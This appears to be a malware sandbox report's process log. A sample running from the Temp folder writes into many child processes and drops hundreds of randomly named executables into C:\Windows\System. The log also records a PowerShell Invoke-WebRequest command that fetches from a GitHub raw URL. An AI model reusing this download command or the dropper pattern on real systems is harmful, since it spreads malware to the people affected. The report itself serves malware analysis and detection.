PID 2092 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ODVXDOO.exe
PID 2092 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\gUmoePo.exe
PID 2092 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\gUmoePo.exe
PID 2092 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\gUmoePo.exe
PID 2092 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oIGTReJ.exe
PID 2092 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oIGTReJ.exe
PID 2092 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oIGTReJ.exe
PID 2092 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\UYNjgSm.exe
PID 2092 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\UYNjgSm.exe
PID 2092 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\UYNjgSm.exe
PID 2092 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\eXiiJTD.exe
PID 2092 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\eXiiJTD.exe
PID 2092 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\eXiiJTD.exe
PID 2092 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ePYaIyB.exe
PID 2092 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ePYaIyB.exe
PID 2092 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ePYaIyB.exe
PID 2092 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\KphViNM.exe
PID 2092 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\KphViNM.exe
PID 2092 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\KphViNM.exe
PID 2092 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jjiNDHr.exe
PID 2092 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jjiNDHr.exe
PID 2092 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jjiNDHr.exe
PID 2092 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GFacxhH.exe
PID 2092 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GFacxhH.exe
PID 2092 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GFacxhH.exe
PID 2092 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oMwjven.exe
PID 2092 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oMwjven.exe
PID 2092 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oMwjven.exe
PID 2092 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CiZUzks.exe
PID 2092 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CiZUzks.exe
PID 2092 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CiZUzks.exe
PID 2092 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jyRvaQg.exe
PID 2092 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jyRvaQg.exe
PID 2092 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jyRvaQg.exe
PID 2092 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\hSdryMs.exe
PID 2092 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\hSdryMs.exe
PID 2092 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\hSdryMs.exe
PID 2092 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\xoJLLzR.exe
PID 2092 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\xoJLLzR.exe
PID 2092 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\xoJLLzR.exe
PID 2092 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\LaBLYyC.exe
PID 2092 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\LaBLYyC.exe
PID 2092 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\LaBLYyC.exe
PID 2092 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\yasqtdR.exe
PID 2092 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\yasqtdR.exe
PID 2092 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\yasqtdR.exe
PID 2092 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\mwWEcqR.exe
PID 2092 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\mwWEcqR.exe
PID 2092 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\mwWEcqR.exe
PID 2092 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\avckCSe.exe
PID 2092 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\avckCSe.exe
PID 2092 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\avckCSe.exe
PID 2092 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GlUaJIp.exe
PID 2092 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GlUaJIp.exe
PID 2092 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GlUaJIp.exe
PID 2092 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\hpsMIJn.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\CKlACnX.exe

C:\Windows\System\CKlACnX.exe

C:\Windows\System\ODVXDOO.exe

C:\Windows\System\ODVXDOO.exe

C:\Windows\System\gUmoePo.exe

C:\Windows\System\gUmoePo.exe

C:\Windows\System\oIGTReJ.exe

C:\Windows\System\oIGTReJ.exe

C:\Windows\System\UYNjgSm.exe

C:\Windows\System\UYNjgSm.exe

C:\Windows\System\eXiiJTD.exe

C:\Windows\System\eXiiJTD.exe

C:\Windows\System\ePYaIyB.exe

C:\Windows\System\ePYaIyB.exe

C:\Windows\System\KphViNM.exe

C:\Windows\System\KphViNM.exe

C:\Windows\System\jjiNDHr.exe

C:\Windows\System\jjiNDHr.exe

C:\Windows\System\GFacxhH.exe

C:\Windows\System\GFacxhH.exe

C:\Windows\System\oMwjven.exe

C:\Windows\System\oMwjven.exe

C:\Windows\System\CiZUzks.exe

C:\Windows\System\CiZUzks.exe

C:\Windows\System\jyRvaQg.exe

C:\Windows\System\jyRvaQg.exe

C:\Windows\System\hSdryMs.exe

C:\Windows\System\hSdryMs.exe

C:\Windows\System\xoJLLzR.exe

C:\Windows\System\xoJLLzR.exe

C:\Windows\System\LaBLYyC.exe

C:\Windows\System\LaBLYyC.exe

C:\Windows\System\yasqtdR.exe

C:\Windows\System\yasqtdR.exe

C:\Windows\System\mwWEcqR.exe

C:\Windows\System\mwWEcqR.exe

C:\Windows\System\avckCSe.exe

C:\Windows\System\avckCSe.exe

C:\Windows\System\GlUaJIp.exe

C:\Windows\System\GlUaJIp.exe

C:\Windows\System\hpsMIJn.exe

C:\Windows\System\hpsMIJn.exe

C:\Windows\System\vgdieTL.exe

C:\Windows\System\vgdieTL.exe

C:\Windows\System\lomDjDP.exe

C:\Windows\System\lomDjDP.exe

C:\Windows\System\ADrxwTW.exe

C:\Windows\System\ADrxwTW.exe

C:\Windows\System\xnSHUHj.exe

C:\Windows\System\xnSHUHj.exe

C:\Windows\System\VWpXCXf.exe

C:\Windows\System\VWpXCXf.exe

C:\Windows\System\UfjpEsM.exe

C:\Windows\System\UfjpEsM.exe

C:\Windows\System\TXpzdpH.exe

C:\Windows\System\TXpzdpH.exe

C:\Windows\System\HjhqejW.exe

C:\Windows\System\HjhqejW.exe

C:\Windows\System\ukQSYaG.exe

C:\Windows\System\ukQSYaG.exe

C:\Windows\System\RKFhkFD.exe

C:\Windows\System\RKFhkFD.exe

C:\Windows\System\OHttPzL.exe

C:\Windows\System\OHttPzL.exe

C:\Windows\System\mMXnQHy.exe

C:\Windows\System\mMXnQHy.exe

C:\Windows\System\bTmkDVI.exe

C:\Windows\System\bTmkDVI.exe

C:\Windows\System\PkOXnQL.exe

C:\Windows\System\PkOXnQL.exe

C:\Windows\System\McwGZrC.exe

C:\Windows\System\McwGZrC.exe

C:\Windows\System\ddWPCqN.exe

C:\Windows\System\ddWPCqN.exe

C:\Windows\System\kPGrKBq.exe

C:\Windows\System\kPGrKBq.exe

C:\Windows\System\AIJHdmH.exe

C:\Windows\System\AIJHdmH.exe

C:\Windows\System\xdVWsbT.exe

C:\Windows\System\xdVWsbT.exe

C:\Windows\System\btIwtAo.exe

C:\Windows\System\btIwtAo.exe

C:\Windows\System\VipnKgc.exe

C:\Windows\System\VipnKgc.exe

C:\Windows\System\IPiDqEe.exe

C:\Windows\System\IPiDqEe.exe

C:\Windows\System\pOPMznh.exe

C:\Windows\System\pOPMznh.exe

C:\Windows\System\xbKiCPM.exe

C:\Windows\System\xbKiCPM.exe

C:\Windows\System\UYcASVq.exe

C:\Windows\System\UYcASVq.exe

C:\Windows\System\MbKhfpD.exe

C:\Windows\System\MbKhfpD.exe

C:\Windows\System\HUNmQKD.exe

C:\Windows\System\HUNmQKD.exe

C:\Windows\System\irsziDH.exe

C:\Windows\System\irsziDH.exe

C:\Windows\System\XKiHnNx.exe

C:\Windows\System\XKiHnNx.exe

C:\Windows\System\ljrjAYH.exe

C:\Windows\System\ljrjAYH.exe

C:\Windows\System\qEzzRYv.exe

C:\Windows\System\qEzzRYv.exe

C:\Windows\System\TTqmQCt.exe

C:\Windows\System\TTqmQCt.exe

C:\Windows\System\ciVQjup.exe

C:\Windows\System\ciVQjup.exe

C:\Windows\System\lNvmite.exe

C:\Windows\System\lNvmite.exe

C:\Windows\System\ioNYSCu.exe

C:\Windows\System\ioNYSCu.exe

C:\Windows\System\MZBBuAP.exe

C:\Windows\System\MZBBuAP.exe

C:\Windows\System\sIDnrOO.exe

C:\Windows\System\sIDnrOO.exe

C:\Windows\System\sOmPLNp.exe

C:\Windows\System\sOmPLNp.exe

C:\Windows\System\hIcoxEP.exe

C:\Windows\System\hIcoxEP.exe

C:\Windows\System\hlVYeYT.exe

C:\Windows\System\hlVYeYT.exe

C:\Windows\System\KRjEaVp.exe

C:\Windows\System\KRjEaVp.exe

C:\Windows\System\jHUxXVg.exe

C:\Windows\System\jHUxXVg.exe

C:\Windows\System\butKUEf.exe

C:\Windows\System\butKUEf.exe

C:\Windows\System\aNZyxXR.exe

C:\Windows\System\aNZyxXR.exe

C:\Windows\System\NwzDrfS.exe

C:\Windows\System\NwzDrfS.exe

C:\Windows\System\ilYNmfl.exe

C:\Windows\System\ilYNmfl.exe

C:\Windows\System\PRTYURe.exe

C:\Windows\System\PRTYURe.exe

C:\Windows\System\hlNkxMO.exe

C:\Windows\System\hlNkxMO.exe

C:\Windows\System\lkwwIic.exe

C:\Windows\System\lkwwIic.exe

C:\Windows\System\QXXTddG.exe

C:\Windows\System\QXXTddG.exe

C:\Windows\System\CCJOpmg.exe

C:\Windows\System\CCJOpmg.exe

C:\Windows\System\OZtntye.exe

C:\Windows\System\OZtntye.exe

C:\Windows\System\xEBZcHO.exe

C:\Windows\System\xEBZcHO.exe

C:\Windows\System\nQftUIc.exe

C:\Windows\System\nQftUIc.exe

C:\Windows\System\uOegLBD.exe

C:\Windows\System\uOegLBD.exe

C:\Windows\System\sgCHqKv.exe

C:\Windows\System\sgCHqKv.exe

C:\Windows\System\DZkRrMA.exe

C:\Windows\System\DZkRrMA.exe

C:\Windows\System\ktdSJqV.exe

C:\Windows\System\ktdSJqV.exe

C:\Windows\System\ZHpgFmx.exe

C:\Windows\System\ZHpgFmx.exe

C:\Windows\System\nYIJwjK.exe

C:\Windows\System\nYIJwjK.exe

C:\Windows\System\muPXlii.exe

C:\Windows\System\muPXlii.exe

C:\Windows\System\rsYrBsi.exe

C:\Windows\System\rsYrBsi.exe

C:\Windows\System\QnmWvOh.exe

C:\Windows\System\QnmWvOh.exe

C:\Windows\System\GeYPNaH.exe

C:\Windows\System\GeYPNaH.exe

C:\Windows\System\vcGZijb.exe

C:\Windows\System\vcGZijb.exe

C:\Windows\System\AwjVCwy.exe

C:\Windows\System\AwjVCwy.exe

C:\Windows\System\Mpbywom.exe

C:\Windows\System\Mpbywom.exe

C:\Windows\System\lBxWvoS.exe

C:\Windows\System\lBxWvoS.exe

C:\Windows\System\qQYpTCf.exe

C:\Windows\System\qQYpTCf.exe

C:\Windows\System\wloEMKT.exe

C:\Windows\System\wloEMKT.exe

C:\Windows\System\EDbyyQH.exe

C:\Windows\System\EDbyyQH.exe

C:\Windows\System\FCKuoVW.exe

C:\Windows\System\FCKuoVW.exe

C:\Windows\System\xLYFfgX.exe

C:\Windows\System\xLYFfgX.exe

C:\Windows\System\MeRFSOs.exe

C:\Windows\System\MeRFSOs.exe

C:\Windows\System\YEkIFSN.exe

C:\Windows\System\YEkIFSN.exe

C:\Windows\System\hwQEmEC.exe

C:\Windows\System\hwQEmEC.exe

C:\Windows\System\etSIznH.exe

C:\Windows\System\etSIznH.exe

C:\Windows\System\ZHBJQaP.exe

C:\Windows\System\ZHBJQaP.exe

C:\Windows\System\mFizbbp.exe

C:\Windows\System\mFizbbp.exe

C:\Windows\System\YQqKmgC.exe

C:\Windows\System\YQqKmgC.exe

C:\Windows\System\KHxtdAk.exe

C:\Windows\System\KHxtdAk.exe

C:\Windows\System\KyseUEI.exe

C:\Windows\System\KyseUEI.exe

C:\Windows\System\xqKgXhO.exe

C:\Windows\System\xqKgXhO.exe

C:\Windows\System\rRBvhtr.exe

C:\Windows\System\rRBvhtr.exe

C:\Windows\System\WYYvjSU.exe

C:\Windows\System\WYYvjSU.exe

C:\Windows\System\tpWYVBd.exe

C:\Windows\System\tpWYVBd.exe

C:\Windows\System\BPbfhCo.exe

C:\Windows\System\BPbfhCo.exe

C:\Windows\System\GdRPnnv.exe

C:\Windows\System\GdRPnnv.exe

C:\Windows\System\ipnPNUz.exe

C:\Windows\System\ipnPNUz.exe

C:\Windows\System\BnwAARx.exe

C:\Windows\System\BnwAARx.exe

C:\Windows\System\EzVNEZD.exe

C:\Windows\System\EzVNEZD.exe

C:\Windows\System\hxFtFtn.exe

C:\Windows\System\hxFtFtn.exe

C:\Windows\System\jVCbVfw.exe

C:\Windows\System\jVCbVfw.exe

C:\Windows\System\SMNjoka.exe

C:\Windows\System\SMNjoka.exe

C:\Windows\System\HafbTjs.exe

C:\Windows\System\HafbTjs.exe

C:\Windows\System\CHdIgHh.exe

C:\Windows\System\CHdIgHh.exe

C:\Windows\System\DBsIGjf.exe

C:\Windows\System\DBsIGjf.exe

C:\Windows\System\IizKity.exe

C:\Windows\System\IizKity.exe

C:\Windows\System\eKzmCcq.exe

C:\Windows\System\eKzmCcq.exe

C:\Windows\System\dWvqsHj.exe

C:\Windows\System\dWvqsHj.exe

C:\Windows\System\DofUfcM.exe

C:\Windows\System\DofUfcM.exe

C:\Windows\System\SmnYCDp.exe

C:\Windows\System\SmnYCDp.exe

C:\Windows\System\TRJsYpg.exe

C:\Windows\System\TRJsYpg.exe

C:\Windows\System\LddZFnO.exe

C:\Windows\System\LddZFnO.exe

C:\Windows\System\miWFzvv.exe

C:\Windows\System\miWFzvv.exe

C:\Windows\System\Butpiqv.exe

C:\Windows\System\Butpiqv.exe

C:\Windows\System\fJtAFCq.exe

C:\Windows\System\fJtAFCq.exe

C:\Windows\System\ooHjPBr.exe

C:\Windows\System\ooHjPBr.exe

C:\Windows\System\snpQsuc.exe

C:\Windows\System\snpQsuc.exe

C:\Windows\System\McSIrrE.exe

C:\Windows\System\McSIrrE.exe

C:\Windows\System\MaLNSxY.exe

C:\Windows\System\MaLNSxY.exe

C:\Windows\System\ijKafJt.exe

C:\Windows\System\ijKafJt.exe

C:\Windows\System\KsgDiKl.exe

C:\Windows\System\KsgDiKl.exe

C:\Windows\System\XxSsZuB.exe

C:\Windows\System\XxSsZuB.exe

C:\Windows\System\RsZeVha.exe

C:\Windows\System\RsZeVha.exe

C:\Windows\System\PrWUKmV.exe

C:\Windows\System\PrWUKmV.exe

C:\Windows\System\PZLUBNT.exe

C:\Windows\System\PZLUBNT.exe

C:\Windows\System\yRbxuAM.exe

C:\Windows\System\yRbxuAM.exe

C:\Windows\System\ztOhOGg.exe

C:\Windows\System\ztOhOGg.exe

C:\Windows\System\YfwaNHB.exe

C:\Windows\System\YfwaNHB.exe

C:\Windows\System\qMWmouZ.exe

C:\Windows\System\qMWmouZ.exe

C:\Windows\System\IJghynz.exe

C:\Windows\System\IJghynz.exe

C:\Windows\System\XJBqAlu.exe

C:\Windows\System\XJBqAlu.exe

C:\Windows\System\JVOvUGk.exe

C:\Windows\System\JVOvUGk.exe

C:\Windows\System\CWikHtR.exe

C:\Windows\System\CWikHtR.exe

C:\Windows\System\oioPqdQ.exe

C:\Windows\System\oioPqdQ.exe

C:\Windows\System\HQwycRt.exe

C:\Windows\System\HQwycRt.exe

C:\Windows\System\awnoIzl.exe

C:\Windows\System\awnoIzl.exe

C:\Windows\System\oHikdtx.exe

C:\Windows\System\oHikdtx.exe

C:\Windows\System\ZeCogDd.exe

C:\Windows\System\ZeCogDd.exe

C:\Windows\System\cgzkpjO.exe

C:\Windows\System\cgzkpjO.exe

C:\Windows\System\EXHeHOu.exe

C:\Windows\System\EXHeHOu.exe

C:\Windows\System\WXkcOov.exe

C:\Windows\System\WXkcOov.exe

C:\Windows\System\VINohYQ.exe

C:\Windows\System\VINohYQ.exe

C:\Windows\System\buzkPkt.exe

C:\Windows\System\buzkPkt.exe

C:\Windows\System\jOcAcCw.exe

C:\Windows\System\jOcAcCw.exe

C:\Windows\System\lNuppAB.exe

C:\Windows\System\lNuppAB.exe

C:\Windows\System\FocxJnl.exe

C:\Windows\System\FocxJnl.exe

C:\Windows\System\aWDhEnG.exe

C:\Windows\System\aWDhEnG.exe

C:\Windows\System\qmwOAiC.exe

C:\Windows\System\qmwOAiC.exe

C:\Windows\System\hcPLZgV.exe

C:\Windows\System\hcPLZgV.exe

C:\Windows\System\veNBrTR.exe

C:\Windows\System\veNBrTR.exe

C:\Windows\System\eNvkCzZ.exe

C:\Windows\System\eNvkCzZ.exe

C:\Windows\System\DFPAzZy.exe

C:\Windows\System\DFPAzZy.exe

C:\Windows\System\WbqMnBY.exe

C:\Windows\System\WbqMnBY.exe

C:\Windows\System\yCyZpaL.exe

C:\Windows\System\yCyZpaL.exe

C:\Windows\System\gwRocKs.exe

C:\Windows\System\gwRocKs.exe

C:\Windows\System\IoyTYse.exe

C:\Windows\System\IoyTYse.exe

C:\Windows\System\mAzVXXP.exe

C:\Windows\System\mAzVXXP.exe

C:\Windows\System\hoffXmG.exe

C:\Windows\System\hoffXmG.exe

C:\Windows\System\MsiKOGV.exe

C:\Windows\System\MsiKOGV.exe

C:\Windows\System\SlGzOGw.exe

C:\Windows\System\SlGzOGw.exe

C:\Windows\System\ORYbYlI.exe

C:\Windows\System\ORYbYlI.exe

C:\Windows\System\MmVLpWt.exe

C:\Windows\System\MmVLpWt.exe

C:\Windows\System\rvqeRMR.exe

C:\Windows\System\rvqeRMR.exe

C:\Windows\System\SmITodz.exe

C:\Windows\System\SmITodz.exe

C:\Windows\System\DZatsoH.exe

C:\Windows\System\DZatsoH.exe

C:\Windows\System\LfLYKrX.exe

C:\Windows\System\LfLYKrX.exe

C:\Windows\System\tnZvMCu.exe

C:\Windows\System\tnZvMCu.exe

C:\Windows\System\wrJolSN.exe

C:\Windows\System\wrJolSN.exe

C:\Windows\System\XIhnyVv.exe

C:\Windows\System\XIhnyVv.exe

C:\Windows\System\eRxriud.exe

C:\Windows\System\eRxriud.exe

C:\Windows\System\iKuSVJh.exe

C:\Windows\System\iKuSVJh.exe

C:\Windows\System\ktocRsD.exe

C:\Windows\System\ktocRsD.exe

C:\Windows\System\QODKBms.exe

C:\Windows\System\QODKBms.exe

C:\Windows\System\FcIYJFo.exe

C:\Windows\System\FcIYJFo.exe

C:\Windows\System\zCkZLwZ.exe

C:\Windows\System\zCkZLwZ.exe

C:\Windows\System\MBxkxug.exe

C:\Windows\System\MBxkxug.exe

C:\Windows\System\nOADPBZ.exe

C:\Windows\System\nOADPBZ.exe

C:\Windows\System\hQmpwJC.exe

C:\Windows\System\hQmpwJC.exe

C:\Windows\System\bmAzfPo.exe

C:\Windows\System\bmAzfPo.exe

C:\Windows\System\UaElBLZ.exe

C:\Windows\System\UaElBLZ.exe

C:\Windows\System\DOTAbNJ.exe

C:\Windows\System\DOTAbNJ.exe

C:\Windows\System\GcUpaKe.exe

C:\Windows\System\GcUpaKe.exe

C:\Windows\System\TGRqhKa.exe

C:\Windows\System\TGRqhKa.exe

C:\Windows\System\DWPbDum.exe

C:\Windows\System\DWPbDum.exe

C:\Windows\System\JsTFogi.exe

C:\Windows\System\JsTFogi.exe

C:\Windows\System\MvzJtPI.exe

C:\Windows\System\MvzJtPI.exe

C:\Windows\System\wvqHGsf.exe

C:\Windows\System\wvqHGsf.exe

C:\Windows\System\ekRuHDA.exe

C:\Windows\System\ekRuHDA.exe

C:\Windows\System\ljrVTZU.exe

C:\Windows\System\ljrVTZU.exe

C:\Windows\System\cLoDiYD.exe

C:\Windows\System\cLoDiYD.exe

C:\Windows\System\eUIudlY.exe

C:\Windows\System\eUIudlY.exe

C:\Windows\System\MPrbtwK.exe

C:\Windows\System\MPrbtwK.exe

C:\Windows\System\KhGIgFD.exe

C:\Windows\System\KhGIgFD.exe

C:\Windows\System\SEqsjcM.exe

C:\Windows\System\SEqsjcM.exe

C:\Windows\System\xLmmsGS.exe

C:\Windows\System\xLmmsGS.exe

C:\Windows\System\VCziOGH.exe

C:\Windows\System\VCziOGH.exe

C:\Windows\System\CLkHYIP.exe

C:\Windows\System\CLkHYIP.exe

C:\Windows\System\AOoupqo.exe

C:\Windows\System\AOoupqo.exe

C:\Windows\System\IRfmpqt.exe

C:\Windows\System\IRfmpqt.exe

C:\Windows\System\HAMYcSu.exe

C:\Windows\System\HAMYcSu.exe

C:\Windows\System\sJNgwMC.exe

C:\Windows\System\sJNgwMC.exe

C:\Windows\System\rgIDJqN.exe

C:\Windows\System\rgIDJqN.exe

C:\Windows\System\EIwxwOj.exe

C:\Windows\System\EIwxwOj.exe

C:\Windows\System\rfjeiNP.exe

C:\Windows\System\rfjeiNP.exe

C:\Windows\System\GglCvVE.exe

C:\Windows\System\GglCvVE.exe

C:\Windows\System\FUTTbdQ.exe

C:\Windows\System\FUTTbdQ.exe

C:\Windows\System\XpmbYZX.exe

C:\Windows\System\XpmbYZX.exe

C:\Windows\System\wzHpBHS.exe

C:\Windows\System\wzHpBHS.exe

C:\Windows\System\rHoNMlo.exe

C:\Windows\System\rHoNMlo.exe

C:\Windows\System\DaCBmCz.exe

C:\Windows\System\DaCBmCz.exe

C:\Windows\System\jJwYZkl.exe

C:\Windows\System\jJwYZkl.exe

C:\Windows\System\ZTCXqpb.exe

C:\Windows\System\ZTCXqpb.exe

C:\Windows\System\kwbnpxt.exe

C:\Windows\System\kwbnpxt.exe

C:\Windows\System\wTGXnbb.exe

C:\Windows\System\wTGXnbb.exe

C:\Windows\System\vcmRsBq.exe

C:\Windows\System\vcmRsBq.exe

C:\Windows\System\tXlgyRw.exe

C:\Windows\System\tXlgyRw.exe

C:\Windows\System\fuPOVHI.exe

C:\Windows\System\fuPOVHI.exe

C:\Windows\System\ExSwrau.exe

C:\Windows\System\ExSwrau.exe

C:\Windows\System\eIIqjnM.exe

C:\Windows\System\eIIqjnM.exe

C:\Windows\System\YLEjXXy.exe

C:\Windows\System\YLEjXXy.exe

C:\Windows\System\VYjJwDl.exe

C:\Windows\System\VYjJwDl.exe

C:\Windows\System\BBYcuFS.exe

C:\Windows\System\BBYcuFS.exe

C:\Windows\System\LAXdzwC.exe

C:\Windows\System\LAXdzwC.exe

C:\Windows\System\qlTRDhQ.exe

